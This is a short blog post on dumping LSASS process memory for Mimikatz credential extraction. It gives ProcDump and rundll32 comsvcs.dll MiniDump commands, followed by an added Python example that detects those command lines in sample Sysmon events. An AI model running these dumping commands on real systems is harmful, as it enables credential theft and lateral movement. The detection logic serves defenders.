Monday, 13 April 2020

LSASS Dumping Methods (For Mimikatz)

In every attack we need to get the Windows credentials; this is a super important task. We target the "LSASS.EXE" process and dump its memory so that the dump can be used for extracting credentials with Mimikatz.

Here are some of the important methods:

Using ProcDump:

1. My favorite method of dumping is using "procdump.exe". This tool is from Microsoft PsTools.
2. Download ProcDump.exe and upload it to the remote system.
3. Command: "procdump -ma lsass.exe lsass.dmp"

Using VB Script:

Download the script from here:

rundll32 Command:

Essentially, the VBS script from the previous method uses the following command to dump the lsass.exe process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So even if you do not have the VB Script with you, you can still run the command directly and dump the LSASS process.
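From the defender's side, both commands above leave a distinctive process-creation command line. The following detection logic is an added example, not part of the original post; the events are constructed samples that use the Sysmon Event ID 1 field names Image and CommandLine, and the rule names are hypothetical.

```python
import re

# ProcDump full-dump switch; both "-" and "/" prefixes are matched.
FULL_DUMP_SWITCH = re.compile(r"(?:^|\s)[-/]ma(?=\s|$)", re.I)
LSASS_TARGET = re.compile(r"\blsass(?:\.exe)?\b", re.I)
# rundll32 calling the MiniDump export of comsvcs.dll. The target is passed as
# a PID (992 in the post), so this rule cannot key on the string "lsass".
COMSVCS_MINIDUMP = re.compile(r"comsvcs(?:\.dll)?\W+minidump\b", re.I)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump -ma lsass.exe lsass.dmp"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 "
                    r"C:\Users\Public\lsass.bin full"},
    {"Image": r"C:\Tools\procdump64.exe",
     "CommandLine": "procdump64.exe -ma notepad.exe notepad.dmp"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]


def classify(event):
    """Return the name of the matching rule, or None if nothing matches."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    exe = image.rsplit("\\", 1)[-1]
    if "procdump" in exe and FULL_DUMP_SWITCH.search(cmd) and LSASS_TARGET.search(cmd):
        return "procdump_lsass_full_dump"
    if image.endswith("\\rundll32.exe") and COMSVCS_MINIDUMP.search(cmd):
        return "comsvcs_minidump"
    return None


def scan(events):
    """Return (index, rule) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        rule = classify(ev)
        if rule:
            hits.append((i, rule))
    return hits


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"ALERT {rule}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Command-line matching depends on the image name and arguments appearing as shown, so it is best paired with process-access telemetry (Sysmon Event ID 10) where lsass.exe is the target.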
